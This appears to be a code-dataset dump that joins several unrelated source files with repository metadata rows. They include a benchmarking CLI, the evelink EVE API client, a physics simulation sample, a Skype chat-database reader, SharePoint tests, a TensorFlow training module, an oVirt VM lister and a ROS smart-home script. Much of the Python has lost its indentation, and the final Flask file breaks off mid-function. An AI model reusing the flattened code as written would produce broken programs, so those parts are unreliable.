help='precision for printing values')
p.add_argument('--quiet', '-q', action='store_true', default=False,
help='avoid printing table to stdout')
p.add_argument('--raw', nargs='?', metavar='FILE', const='data.csv',
help='write measurement results to file')
p.add_argument('--repeat', '-n', type=int, default=2,
help='number of times to repeat the measurement')
p.add_argument('--sleep', type=float, default=0.0, metavar='SECONDS',
help='sleep between runs')
p.add_argument('--svg', nargs='?', const='benchmark.svg',
help='write boxplot')
p.add_argument('--tags', nargs='+', default=[],
help='alternative names for the different commands')
p.add_argument('--time', default='/usr/bin/time',
help='measurement program (default: GNU time)')
p.add_argument('--time-args', nargs='+',
default=[ '--append', '--format', '%e,%U,%S,%M', '--output', '$<' ],
help='default arguments to measurement program')
p.add_argument('--timeout', help='timeout for waiting on a child')
p.add_argument('--title', help='title of the graph')
p.add_argument('--width', type=float, help='width of the graph (inch)')
p.add_argument('--xlabel', default='experiment', help='x-axis label')
p.add_argument('--xrotate', type=int,
help='rotate x-labels (default: 75 degrees if more than 4 present')
p.add_argument('--ylabel', default='time (s)', help='y-axis label')
p.add_argument('--ymax', type=float,
help='set upper y-axis limit')
p.add_argument('--ymin', type=float, default=0.0,
help='set lower y-axis limit')
return p
class InitPstat(argparse.Action):
def __init__(self, option_strings, dest, **kwargs):
super(InitPstat, self).__init__(
option_strings, dest, nargs=0, **kwargs)
def __call__(self, parser, args, values, option_string=None):
args.time = 'perfstat.sh'
args.time_args = [ '-o', '$<' ]
args.cols = list(range(1,12))
args.items = [ 'nsec','cswitch','cpu_migr','page_fault','cycles','ghz','ins','ins_cyc','br','br_mis','br_mis_rate' ]
if not args.graph_item:
args.graph_item = 'ins_cyc'
args.title = 'Counter ({})'.format(args.graph_item)
args.ylabel = 'rate'
def parse_args(xs = None):
arg_parser = mk_arg_parser()
if xs or xs == []:
args = arg_parser.parse_args(xs)
else:
args = arg_parser.parse_args()
if not args.argv and not args.input:
raise ValueError('Neither cmd+args nor --input option present')
if args.debug:
setup_file_logging(args.debug)
if args.argv:
args.cmd = [ args.argv[0] ] + args.cmd
args.argv = args.argv[1:]
args.cols = [ int(x) for x in args.cols ]
  if args.tags and args.tags.__len__() != args.cmd.__len__():
raise ValueError('not enough tags specified')
if not args.tags:
args.tags = [ os.path.basename(x) for x in args.cmd ]
if not args.graph_item:
args.graph_item = args.items[0]
if not args.title:
args.title = 'Runtime ({})'.format(args.graph_item)
if args.svg:
#import matplotlib.pyplot as plt
global matplotlib
global plt
matplotlib = __import__('matplotlib.pyplot', globals(), locals())
plt = matplotlib.pyplot
if args.csv or not args.quiet or args.svg:
global np
numpy = __import__('numpy', globals(), locals())
np = numpy
#import numpy as np
return args
log_format = '%(asctime)s - %(levelname)-8s - %(message)s'
log_date_format = '%Y-%m-%d %H:%M:%S'
def mk_formatter():
f = logging.Formatter(log_format, log_date_format)
return f
def mk_logger():
log = logging.getLogger() # root logger
log.setLevel(logging.DEBUG)
#log.setLevel(logging.INFO)
if have_colorlog:
cformat = '%(log_color)s' + log_format
cf = colorlog.ColoredFormatter(cformat, log_date_format,
log_colors = { 'DEBUG': 'reset', 'INFO': 'reset',
'WARNING' : 'bold_yellow' , 'ERROR': 'bold_red',
'CRITICAL': 'bold_red'})
else:
cf = logging.Formatter(log_format, log_date_format)
ch = logging.StreamHandler()
ch.setLevel(logging.WARNING)
if os.isatty(2):
ch.setFormatter(cf)
else:
    ch.setFormatter(mk_formatter())
log.addHandler(ch)
return logging.getLogger(__name__)
log = mk_logger()
def setup_file_logging(filename):
log = logging.getLogger()
fh = logging.FileHandler(filename)
fh.setLevel(logging.DEBUG)
f = logging.Formatter(log_format + ' - [%(name)s]', log_date_format)
fh.setFormatter(f)
log.addHandler(fh)
# Reasons for using an external `time` command instead of
# calling e.g. `getrusage()`:
# - the forked child will start
# with the RSS of the python parent - thus, it will be reported
# too high if child actually uses less memory
# - same code path as for other measurement tools
# - elapsed time would have to be measured separately, otherwise
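# Illustrative example (values assumed): with the default format string
# '%e,%U,%S,%M', GNU time appends a line such as "0.52,0.31,0.05,10432" to the
# output file, i.e. wall, user and sys seconds followed by the maximum RSS in kB.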
def measure(tag, cmd, args):
errors = 0
if args.null_out:
stdout = subprocess.DEVNULL
else:
stdout = None
with tempfile.NamedTemporaryFile(mode='w+', newline='') as temp_file:
time_args = args.time_args.copy()
time_args[time_args.index('$<')] = temp_file.name
a = [ args.time ] + time_args + [cmd] + args.argv
rc = -1
with subprocess.Popen(a, stdout=stdout) as p:
rc = p.wait(timeout=args.timeout)
if rc != 0:
log.error('Command {} failed with rc: {}'.format(cmd, rc))
errors = errors + 1
reader = csv.reader(temp_file)
r = [tag] + next(reader)
r.append(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
r.append(rc)
r.append(cmd)
r.append(str(args.argv))
return (r, errors)
def execute(args):
xs = []
esum = 0
for (tag, cmd) in zip(args.tags, args.cmd):
rs = []
for i in range(args.repeat):
try:
m, errors = measure(tag, cmd, args)
if args.sleep > 0:
time.sleep(args.sleep)
rs.append(m)
esum = esum + errors
except StopIteration:
esum = esum + 1
        log.error("Couldn't read measurements from temporary file"
+ '- {} - {}'.format(tag, i))
xs.append( (tag, rs) )
return (xs, esum)
def read_raw(filename):
with open(filename, 'r', newline='') as f:
reader = csv.reader(f)
rs = []
next(reader)
xs = [ (k, list(l))
for (k, l) in itertools.groupby(reader, lambda row: row[0])]
# is equivalent to:
# prev = None
# xs = []
# l = []
# for row in reader:
# if prev != row[0]:
# l = []
# xs.append( (row[0], l) )
# l.append(row)
# prev = row[0]
return xs
def write_raw(rrs, args, filename):
with open(filename, 'a', newline='') as f:
writer = csv.writer(f)
writer.writerow(['tag'] + args.items + ['date', 'rc', 'cmd', 'args' ])
for rs in rrs:
for row in rs[1]:
writer.writerow(row)
def write_svg(ys, args, filename):
tags, items_l = zip(*ys)
xrotate = args.xrotate
if not xrotate and tags.__len__() > 4:
xrotate = 75
if args.width and args.height:
plt.figure(figsize=(args.width, args.height))
r = plt.boxplot( [ items[args.graph_item] for items in items_l ],
labels=tags )
ymax = args.ymax
if not args.ymax:
m = np.amax([np.amax(items[args.graph_item]) for items in items_l ])
ymax = np.ceil(m + (m - args.ymin) / 10)
plt.ylim(ymin=args.ymin, ymax=ymax)
plt.title(args.title)
if xrotate:
plt.xticks(rotation=xrotate) # 70 # 90
plt.xlabel(args.xlabel)
plt.ylabel(args.ylabel)
plt.tight_layout()
plt.savefig(filename)
# normally, we would just use a csv.writer() but
# we want to control the number of significant figures
def write_csv(zs, args, f):
if not zs:
return
header = ['tag'] + list(zs[0][1]._fields)
fstr = '{:1.'+str(args.precision)+'f}'
print(','.join(header), file=f)
for (tag, stat) in zs:
row = [tag] + list(stat)
srow = []
for r in row:
if type(r) is float or type(r) is np.float64:
srow.append(fstr.format(r))
else:
srow.append(str(r))
print(','.join(srow), file=f)
def get_items(rs, args):
m = np.zeros(rs.__len__(), dtype=[(x, 'float64') for x in args.items ] )
i = 0
for row in rs:
j = 0
for c in args.cols:
v = row[c]
m[i][j] = 0 if v == '' else v
j = j + 1
i = i + 1
return m
Stat = collections.namedtuple('Stat',
['n', 'min', 'Q1', 'median', 'Q3', 'max', 'mean', 'dev', 'item' ])
def gen_stats(items, args):
#for name in items.dtype.names:
name = args.graph_item
c = items[name]
ps = np.percentile(c, [25, 50, 75] )
# there is also np.median()
s = Stat(n=c.__len__(), min=np.amin(c), Q1=ps[0], median=ps[1],
Q3=ps[2], max=np.amax(c),
mean=np.mean(c), dev=np.std(c), item=name)
return s
def run(args):
xs = []
errors = 0
if args.input:
xs = xs + read_raw(args.input)
if args.cmd:
rxs, errors = execute(args)
xs = xs + rxs
if args.csv or not args.quiet or args.svg:
ys = [ (tag, get_items(rs, args)) for (tag, rs) in xs ]
if args.csv or not args.quiet:
zs = [ (tag, gen_stats(items, args)) for (tag, items) in ys ]
if args.csv:
with open(args.csv, 'w') as f:
write_csv(zs, args, f)
if not args.quiet:
write_csv(zs, args, sys.stdout)
if args.raw:
write_raw(xs, args, args.raw)
if args.svg:
write_svg(ys, args, args.svg)
return int(errors != 0)
def main():
args = parse_args()
return run(args)
if __name__ == '__main__':
sys.exit(main())
|
gpl-3.0
| 8,276,299,148,018,042,000
| 30.973333
| 120
| 0.621101
| false
| 3.215339
| false
| false
| false
|
EricE/evelink
|
evelink/api.py
|
1
|
9272
|
from cStringIO import StringIO
import calendar
import functools
import logging
import re
import time
from urllib import urlencode
import urllib2
from xml.etree import ElementTree
_log = logging.getLogger('evelink.api')
try:
import requests
_has_requests = True
except ImportError:
_log.info('`requests` not available, falling back to urllib2')
_has_requests = None
def _clean(v):
"""Convert parameters into an acceptable format for the API."""
if isinstance(v, (list, set, tuple)):
return ",".join(str(i) for i in v)
else:
return str(v)
def parse_ts(v):
"""Parse a timestamp from EVE API XML into a unix-ish timestamp."""
if v == '':
return None
ts = calendar.timegm(time.strptime(v, "%Y-%m-%d %H:%M:%S"))
# Deal with EVE's nonexistent 0001-01-01 00:00:00 timestamp
return ts if ts > 0 else None
def get_named_value(elem, field):
"""Returns the string value of the named child element."""
try:
return elem.find(field).text
except AttributeError:
return None
def get_ts_value(elem, field):
"""Returns the timestamp value of the named child element."""
val = get_named_value(elem, field)
if val:
return parse_ts(val)
return None
def get_int_value(elem, field):
"""Returns the integer value of the named child element."""
val = get_named_value(elem, field)
if val:
return int(val)
return val
def get_float_value(elem, field):
"""Returns the float value of the named child element."""
val = get_named_value(elem, field)
if val:
return float(val)
return val
def get_bool_value(elem, field):
"""Returns the boolean value of the named child element."""
val = get_named_value(elem, field)
if val == 'True':
return True
elif val == 'False':
return False
return None
def elem_getters(elem):
"""Returns a tuple of (_str, _int, _float, _bool, _ts) functions.
These are getters closed around the provided element.
"""
_str = lambda key: get_named_value(elem, key)
_int = lambda key: get_int_value(elem, key)
_float = lambda key: get_float_value(elem, key)
_bool = lambda key: get_bool_value(elem, key)
_ts = lambda key: get_ts_value(elem, key)
return _str, _int, _float, _bool, _ts
def parse_keyval_data(data_string):
"""Parse 'key: value' lines from a LF-delimited string."""
keyval_pairs = data_string.strip().split('\n')
results = {}
for pair in keyval_pairs:
key, _, val = pair.strip().partition(': ')
if 'Date' in key:
val = parse_ms_date(val)
elif val == 'null':
val = None
elif re.match(r"^-?\d+$", val):
val = int(val)
elif re.match(r"-?\d+\.\d+", val):
val = float(val)
results[key] = val
return results
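# Illustrative example (field names assumed, not a real API response):
# parse_keyval_data('accessMask: 268435455\nexpired: null') returns
# {'accessMask': 268435455, 'expired': None}.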
def parse_ms_date(date_string):
"""Convert MS date format into epoch"""
    return int(date_string)/10000000 - 11644473600
class APIError(Exception):
"""Exception raised when the EVE API returns an error."""
def __init__(self, code=None, message=None):
self.code = code
self.message = message
def __repr__(self):
return "APIError(%r, %r)" % (self.code, self.message)
def __str__(self):
return "%s (code=%d)" % (self.message, int(self.code))
class APICache(object):
"""Minimal interface for caching API requests.
This very basic implementation simply stores values in
memory, with no other persistence. You can subclass it
to define a more complex/featureful/persistent cache.
"""
def __init__(self):
self.cache = {}
def get(self, key):
"""Return the value referred to by 'key' if it is cached.
key:
a result from the Python hash() function.
"""
result = self.cache.get(key)
if not result:
return None
value, expiration = result
if expiration < time.time():
del self.cache[key]
return None
return value
def put(self, key, value, duration):
"""Cache the provided value, referenced by 'key', for the given duration.
key:
a result from the Python hash() function.
value:
an xml.etree.ElementTree.Element object
duration:
a number of seconds before this cache entry should expire.
"""
expiration = time.time() + duration
self.cache[key] = (value, expiration)
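# A minimal sketch (not part of evelink itself) of a persistent cache: because
# APICache.get()/put() only use dict-style access on self.cache, and the keys
# produced by API._cache_key() are already strings, a shelve file can be
# substituted for the in-memory dict. The file name below is an assumption.
class ShelveAPICache(APICache):
    """Example APICache subclass that persists entries with shelve."""
    def __init__(self, filename='evelink_cache.db'):
        import shelve
        # shelve requires string keys; API._cache_key() provides them.
        self.cache = shelve.open(filename)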
class API(object):
"""A wrapper around the EVE API."""
def __init__(self, base_url="api.eveonline.com", cache=None, api_key=None):
self.base_url = base_url
cache = cache or APICache()
if not isinstance(cache, APICache):
raise ValueError("The provided cache must subclass from APICache.")
self.cache = cache
self.CACHE_VERSION = '1'
if api_key and len(api_key) != 2:
raise ValueError("The provided API key must be a tuple of (keyID, vCode).")
self.api_key = api_key
self._set_last_timestamps()
def _set_last_timestamps(self, current_time=0, cached_until=0):
self.last_timestamps = {
'current_time': current_time,
'cached_until': cached_until,
}
def _cache_key(self, path, params):
sorted_params = sorted(params.iteritems())
# Paradoxically, Shelve doesn't like integer keys.
return '%s-%s' % (self.CACHE_VERSION, hash((path, tuple(sorted_params))))
def get(self, path, params=None):
"""Request a specific path from the EVE API.
The supplied path should be a slash-separated path
        fragment, e.g. "corp/AssetList". (Basically, the portion
of the API url in between the root / and the .xml bit.)
"""
params = params or {}
params = dict((k, _clean(v)) for k,v in params.iteritems())
_log.debug("Calling %s with params=%r", path, params)
if self.api_key:
_log.debug("keyID and vCode added")
params['keyID'] = self.api_key[0]
params['vCode'] = self.api_key[1]
key = self._cache_key(path, params)
response = self.cache.get(key)
cached = response is not None
if not cached:
# no cached response body found, call the API for one.
params = urlencode(params)
full_path = "https://%s/%s.xml.aspx" % (self.base_url, path)
response = self.send_request(full_path, params)
else:
_log.debug("Cache hit, returning cached payload")
tree = ElementTree.parse(StringIO(response))
current_time = get_ts_value(tree, 'currentTime')
expires_time = get_ts_value(tree, 'cachedUntil')
self._set_last_timestamps(current_time, expires_time)
if not cached:
# Have to split this up from above as timestamps have to be
# extracted.
self.cache.put(key, response, expires_time - current_time)
error = tree.find('error')
if error is not None:
code = error.attrib['code']
message = error.text.strip()
exc = APIError(code, message)
_log.error("Raising API error: %r" % exc)
raise exc
result = tree.find('result')
return result
def send_request(self, full_path, params):
if _has_requests:
return self.requests_request(full_path, params)
else:
return self.urllib2_request(full_path, params)
def urllib2_request(self, full_path, params):
try:
if params:
# POST request
_log.debug("POSTing request")
r = urllib2.urlopen(full_path, params)
else:
# GET request
_log.debug("GETting request")
r = urllib2.urlopen(full_path)
result = r.read()
r.close()
return result
except urllib2.URLError as e:
# TODO: Handle this better?
raise e
def requests_request(self, full_path, params):
session = getattr(self, 'session', None)
if not session:
session = requests.Session()
self.session = session
try:
if params:
# POST request
_log.debug("POSTing request")
r = session.post(full_path, params=params)
else:
# GET request
_log.debug("GETting request")
r = session.get(full_path)
return r.content
except requests.exceptions.RequestException as e:
# TODO: Handle this better?
raise e
def auto_api(func):
"""A decorator to automatically provide an API instance.
Functions decorated with this will have the api= kwarg
automatically supplied with a default-initialized API()
object if no other API object is supplied.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
if 'api' not in kwargs:
kwargs['api'] = API()
return func(*args, **kwargs)
return wrapper
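# A minimal usage sketch of auto_api; the function name and API path below are
# illustrative assumptions rather than part of evelink:
@auto_api
def example_server_status(api=None):
    """Return the <result> element of an example endpoint."""
    return api.get('server/ServerStatus')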
# vim: set ts=4 sts=4 sw=4 et:
|
mit
| 5,219,783,712,813,521,000
| 29.201954
| 87
| 0.584232
| false
| 3.948893
| false
| false
| false
|
KonradBreitsprecher/espresso
|
samples/ekboundaries.py
|
1
|
1441
|
from espressomd import System, shapes, electrokinetics
import sys
system = System(box_l = [10, 10, 10])
system.set_random_state_PRNG()
#system.seed = system.cell_system.get_state()['n_nodes'] * [1234]
system.cell_system.skin = 0.4
system.time_step = 0.1
ek = electrokinetics.Electrokinetics(
lb_density=1, friction=1, agrid=1, viscosity=1, T=1, prefactor=1)
pos = electrokinetics.Species(
density=0.05, D=0.1, valency=1, ext_force=[0, 0, 1.])
neg = electrokinetics.Species(
density=0.05, D=0.1, valency=-1, ext_force=[0, 0, -1.])
ek.add_species(pos)
ek.add_species(neg)
system.actors.add(ek)
print(ek.get_params())
print(pos.get_params())
print(neg.get_params())
print(pos[5, 5, 5].density)
ek_wall_left = electrokinetics.EKBoundary(
shape=shapes.Wall(dist=1, normal=[1, 0, 0]), charge_density=-0.01)
ek_wall_right = electrokinetics.EKBoundary(
shape=shapes.Wall(dist=-9, normal=[-1, 0, 0]), charge_density=0.01)
system.ekboundaries.add(ek_wall_left)
system.ekboundaries.add(ek_wall_right)
for i in range(1000):
system.integrator.run(100)
sys.stdout.write("\rIntegrating: %03i" % i)
sys.stdout.flush()
pos.print_vtk_density("ek/pos_dens_%i.vtk" % i)
neg.print_vtk_density("ek/neg_dens_%i.vtk" % i)
pos.print_vtk_flux("ek/pos_flux_%i.vtk" % i)
neg.print_vtk_flux("ek/neg_flux_%i.vtk" % i)
ek.print_vtk_velocity("ek/ekv_%i.vtk" % i)
ek.print_vtk_boundary("ek/ekb_%i.vtk" % i)
|
gpl-3.0
| -5,257,314,025,805,871,000
| 29.659574
| 71
| 0.676613
| false
| 2.467466
| false
| false
| false
|
btwn2thvs/skype-me
|
skype-search/skype-dao.py
|
1
|
1424
|
import sqlite3
import logging
DATABASE = '/Users/wcampbell/Library/Application Support/Skype/willcampbell_ha/main.db'
unique_participants_sql = 'SELECT DISTINCT(participants) FROM Chats'
messages_by_author_sql = 'SELECT from_dispname, body_xml FROM Messages where dialog_partner = ?'
def most_common(t):
word_counter = {}
for word in t:
if word and word != "willcampbell_ha":
if word in word_counter:
word_counter[word] += 1
else:
word_counter[word] = 1
popular_words = sorted(word_counter, key = word_counter.get, reverse = True)
return popular_words
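# Illustrative example (names assumed): most_common(['bob', 'alice', 'bob',
# 'willcampbell_ha']) returns ['bob', 'alice']; the owner's own handle and
# empty entries are excluded from the count.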
class BaseDao(object):
def __init__(self, db):
logging.info('Opening a sqlite db connection')
self.conn = sqlite3.connect(db)
self.c = self.conn.cursor()
def get_all_messages(self, *authors):
'''
Return a list of messages by authors
'''
self.c.execute(messages_by_author_sql, authors)
return self.c.fetchall()
def get_unique_participants(self):
self.c.execute(unique_participants_sql)
return self.c.fetchall()
b = BaseDao(DATABASE)
#print b.get_all_messages("stacy.vanderworth")
p = []
for participants in b.get_unique_participants():
participant_list = participants[0]
if participant_list:
p += participant_list.split()
print most_common(p)[:3]
|
mit
| -6,106,299,922,487,574,000
| 29.319149
| 96
| 0.632725
| false
| 3.614213
| false
| false
| false
|
vgrem/Office365-REST-Python-Client
|
tests/sharepoint/test_publishing.py
|
1
|
1894
|
from office365.sharepoint.publishing.primary_city_time import PrimaryCityTime
from office365.sharepoint.publishing.site_page_metadata_collection import SitePageMetadataCollection
from office365.sharepoint.publishing.site_page_service import SitePageService
from office365.sharepoint.publishing.video_service_discoverer import VideoServiceDiscoverer
from tests.sharepoint.sharepoint_case import SPTestCase
class TestSPPublishing(SPTestCase):
@classmethod
def setUpClass(cls):
super(TestSPPublishing, cls).setUpClass()
@classmethod
def tearDownClass(cls):
pass
def test1_init_site_page_service(self):
svc = SitePageService(self.client).get().execute_query()
self.assertIsNotNone(svc.resource_path)
def test2_get_site_pages(self):
svc = SitePageService(self.client)
pages = svc.pages().get().execute_query()
self.assertIsInstance(pages, SitePageMetadataCollection)
def test3_get_time_zone(self):
time_zone = SitePageService.get_time_zone(self.client, "Moscow").execute_query()
self.assertIsInstance(time_zone, PrimaryCityTime)
self.assertEqual(time_zone.properties.get("Location"), "Moscow, Russia")
def test4_compute_file_name(self):
result = SitePageService.compute_file_name(self.client, "Test page").execute_query()
self.assertIsNotNone(result.value)
def test5_file_picker_tab_options(self):
result = SitePageService.file_picker_tab_options(self.client).execute_query()
self.assertIsNotNone(result.value)
def test6_org_assets(self):
result = SitePageService.org_assets(self.client).execute_query()
self.assertIsNotNone(result.value)
def test7_get_video_service_manager(self):
discoverer = VideoServiceDiscoverer(self.client).get().execute_query()
self.assertIsNotNone(discoverer.resource_path)
|
mit
| -887,073,155,801,701,000
| 40.173913
| 100
| 0.73548
| false
| 3.772908
| true
| false
| false
|
google/eng-edu
|
ml/guides/text_classification/batch_train_sequence_model.py
|
1
|
6910
|
"""Module to train sequence model with batches of data.
Vectorizes training and validation texts into sequences and uses that for
training a sequence model - a sepCNN model. We use sequence model for text
classification when the ratio of number of samples to number of words per
sample for the given dataset is very large (>~15K). This module is identical to
the `train_sequence_model` module except that we pass the data in batches for
training. This is required when you have a very large dataset that does not fit
into memory.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import time
import tensorflow as tf
import numpy as np
import build_model
import load_data
import vectorize_data
import explore_data
FLAGS = None
# Limit on the number of features. We use the top 20K features.
TOP_K = 20000
def _data_generator(x, y, num_features, batch_size):
"""Generates batches of vectorized texts for training/validation.
# Arguments
x: np.matrix, feature matrix.
y: np.ndarray, labels.
num_features: int, number of features.
batch_size: int, number of samples per batch.
# Returns
Yields feature and label data in batches.
"""
num_samples = x.shape[0]
num_batches = num_samples // batch_size
if num_samples % batch_size:
num_batches += 1
while 1:
for i in range(num_batches):
start_idx = i * batch_size
end_idx = (i + 1) * batch_size
if end_idx > num_samples:
end_idx = num_samples
x_batch = x[start_idx:end_idx]
y_batch = y[start_idx:end_idx]
yield x_batch, y_batch
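# Illustrative note (numbers assumed): with 1,050 samples and batch_size=128,
# the generator above cycles through ceil(1050 / 128) = 9 batches per epoch,
# the last batch holding the remaining 26 samples.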
def batch_train_sequence_model(data,
learning_rate=1e-3,
epochs=1000,
batch_size=128,
blocks=2,
filters=64,
dropout_rate=0.2,
embedding_dim=200,
kernel_size=3,
pool_size=3):
"""Trains sequence model on the given dataset.
# Arguments
data: tuples of training and test texts and labels.
learning_rate: float, learning rate for training model.
epochs: int, number of epochs.
batch_size: int, number of samples per batch.
blocks: int, number of pairs of sepCNN and pooling blocks in the model.
filters: int, output dimension of sepCNN layers in the model.
dropout_rate: float: percentage of input to drop at Dropout layers.
embedding_dim: int, dimension of the embedding vectors.
kernel_size: int, length of the convolution window.
pool_size: int, factor by which to downscale input at MaxPooling layer.
# Raises
ValueError: If validation data has label values which were not seen
in the training data.
"""
# Get the data.
(train_texts, train_labels), (val_texts, val_labels) = data
# Verify that validation labels are in the same range as training labels.
num_classes = explore_data.get_num_classes(train_labels)
unexpected_labels = [v for v in val_labels if v not in range(num_classes)]
if len(unexpected_labels):
raise ValueError('Unexpected label values found in the validation set:'
' {unexpected_labels}. Please make sure that the '
'labels in the validation set are in the same range '
'as training labels.'.format(
unexpected_labels=unexpected_labels))
# Vectorize texts.
x_train, x_val, word_index = vectorize_data.sequence_vectorize(
train_texts, val_texts)
# Number of features will be the embedding input dimension. Add 1 for the
# reserved index 0.
num_features = min(len(word_index) + 1, TOP_K)
# Create model instance.
model = build_model.sepcnn_model(blocks=blocks,
filters=filters,
kernel_size=kernel_size,
embedding_dim=embedding_dim,
dropout_rate=dropout_rate,
pool_size=pool_size,
input_shape=x_train.shape[1:],
num_classes=num_classes,
num_features=num_features)
# Compile model with learning parameters.
if num_classes == 2:
loss = 'binary_crossentropy'
else:
loss = 'sparse_categorical_crossentropy'
optimizer = tf.keras.optimizers.Adam(lr=learning_rate)
model.compile(optimizer=optimizer, loss=loss, metrics=['acc'])
# Create callback for early stopping on validation loss. If the loss does
# not decrease in two consecutive tries, stop training.
callbacks = [tf.keras.callbacks.EarlyStopping(
monitor='val_loss', patience=2)]
# Create training and validation generators.
training_generator = _data_generator(
x_train, train_labels, num_features, batch_size)
validation_generator = _data_generator(
x_val, val_labels, num_features, batch_size)
# Get number of training steps. This indicated the number of steps it takes
# to cover all samples in one epoch.
steps_per_epoch = x_train.shape[0] // batch_size
if x_train.shape[0] % batch_size:
steps_per_epoch += 1
# Get number of validation steps.
validation_steps = x_val.shape[0] // batch_size
if x_val.shape[0] % batch_size:
validation_steps += 1
# Train and validate model.
history = model.fit_generator(
generator=training_generator,
steps_per_epoch=steps_per_epoch,
validation_data=validation_generator,
validation_steps=validation_steps,
callbacks=callbacks,
epochs=epochs,
verbose=2) # Logs once per epoch.
# Print results.
history = history.history
print('Validation accuracy: {acc}, loss: {loss}'.format(
acc=history['val_acc'][-1], loss=history['val_loss'][-1]))
# Save model.
model.save('amazon_reviews_sepcnn_model.h5')
return history['val_acc'][-1], history['val_loss'][-1]
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='./data',
help='input data directory')
FLAGS, unparsed = parser.parse_known_args()
# Using the Amazon reviews dataset to demonstrate training of
# sequence model with batches of data.
data = load_data.load_amazon_reviews_sentiment_analysis_dataset(
FLAGS.data_dir)
batch_train_sequence_model(data)
|
apache-2.0
| -3,906,409,651,647,072,000
| 37.176796
| 79
| 0.607236
| false
| 4.270705
| false
| false
| false
|
jwmatthews/cloud_forms_and_rhev_scripts
|
list_ips_of_vms.py
|
1
|
1405
|
#! /usr/bin/env python
import os
import sys
try:
from ovirtsdk.api import API
from ovirtsdk.xml import params
except:
print "Please re-run after you have installed 'ovirt-engine-sdk-python'"
print "Example: easy_install ovirt-engine-sdk-python"
sys.exit()
ENV_IP = "OVIRT_IP"
ENV_USERNAME = "OVIRT_USERNAME"
ENV_PASSWORD = "OVIRT_PASSWORD"
def get_all_vms(api):
return api.vms.list()
def print_all_vms(api):
vms = get_all_vms(api)
for vm in vms:
print "Name: %s, IP: %s" % (vm.name, get_guest_ip(vm))
def get_guest_ip(vm):
info = vm.get_guest_info()
if info is None:
return None
return info.get_ips().get_ip()[0].get_address()
if __name__ == "__main__":
for env_var in [ENV_IP, ENV_USERNAME, ENV_PASSWORD]:
if env_var not in os.environ:
print "Please re-run after you have set an environment variable for '%s'" % (env_var)
sys.exit()
ip = os.environ[ENV_IP]
password = os.environ[ENV_PASSWORD]
username = os.environ[ENV_USERNAME]
url = "https://%s" % (ip)
api = API(url=url, username=username, password=password, insecure=True)
if not api:
print "Failed to connect to '%s'" % (url)
sys.exit()
print_all_vms(api)
vms2 = api.vms.list(query='name=CloudForms_JWM')
if vms2:
vm = vms2[0]
print vm.name
print get_guest_ip(vm)
|
gpl-2.0
| 3,157,357,523,736,450,000
| 24.545455
| 97
| 0.6121
| false
| 3.061002
| false
| false
| false
|
ppp2006/runbot_number0
|
neo_questions/iSmarthomeCtrl.py
|
1
|
2532
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#Copyright (C) 2012-2013 Thecorpora Inc.
#
#This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import rospy
import os
import subprocess
import jieba
from questions import *
from qbo_smart_home_services.srv import *
def smarthomefenci(sentence, language):
    # Segment the sentence and pick out the location/device/action keywords.
    # location_list, device_list and action_list are expected to be provided
    # by the wildcard import of the questions module above.
    param_location = ""
    param_device = ""
    param_action = ""
    seg_list = []
    seg_list1 = jieba.cut(sentence)
    for seg in seg_list1:
        seg_list.append(seg)
    for location in location_list:
        if location in seg_list:
            param_location = location
            print param_location
    for device in device_list:
        if device in seg_list:
            param_device = device
            print param_device
    for action in action_list:
        if action in seg_list:
            param_action = action
            print param_action
    if param_location != "" and param_device != "" and param_action != "":
        print "param OK"
    return param_location, param_device, param_action
def smarthomectrl(sentence,language):
# call "/say" service to speak selected words
rospy.wait_for_service("/smart_home_set_host")
client_sethost = rospy.ServiceProxy("/smart_home_set_host", SetHost)
rospy.wait_for_service("/smart_home_single_ctrl")
client_singlectrl = rospy.ServiceProxy("/smart_home_single_ctrl", SingleCtrl)
# print "sentence:%s"%sentence
# print "language:%s"%language
# sentencelist=sentence.split(' ',2)
# print sentencelist[1]
# txtname=sentencelist[1]
    param_location, param_device, param_action = smarthomefenci(sentence, language)
client_sethost("192.168.0.134")
# client_singlectrl("客厅", "吊灯左", "开")
client_singlectrl(param_location, param_device, param_action)
# client_speak("客厅吊灯开")
# rospy.wait_for_service("/qbo_face_recognition/train");
# service_facetrain = rospy.ServiceProxy('/qbo_face_recognition/train', Train)
# res = service_facetrain()
# rospy.loginfo(res.taught)
# return "你好%s,我已经认识你了"%personname
|
lgpl-2.1
| 4,922,438,022,231,389,000
| 41.965517
| 240
| 0.696228
| false
| 3.490196
| false
| false
| false
|
jiherrero4/spark
|
app_local.py
|
1
|
13545
|
#!/usr/bin/env python
# encoding: utf-8
import urllib
import json
import os
import requests
import sys
import webbrowser
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from flask import Flask
from flask import request
from flask import make_response
from flask_restful import Resource, Api
from flaskext.mysql import MySQL
# Flask app should start in global layout
# Flask is a web framework, so we can program specific actions based on
# the type of web message that arrives at our application
#
#
app = Flask(__name__)
# We use labels to store the Spark room identifier for each session.
# If we do not know it yet, we go and look it up.
labels = [["f0b38c60-9a87-11e6-9343-85f91990429b",
"Y2lzY29zcGFyazovL3VzL1JPT00vM2I5OGI5NTMtMGQyNC0zZDY5LWIyNTMtNzkxNzljOWZkNTVj"]]
# Now define what to do when our application receives a POST webhook
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("PASO1: Request recibido de api.ai:")
    # With indent we add spaces to the output format
    # so that it reads better rather than as plain, unformatted text.
print(json.dumps(req, indent=4))
res = processRequest(req)
    # Convert res into indented JSON format.
res = json.dumps(res, indent=4)
# print(res)
    # The response must be of type application/json
    # The make_response function comes from the Flask library
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
# In this function we process the webhook (POST) message we have received.
# The first thing we look for is the action to perform.
#
#
def processRequest(req):
dato = ""
    # Bot access data: the bot's token
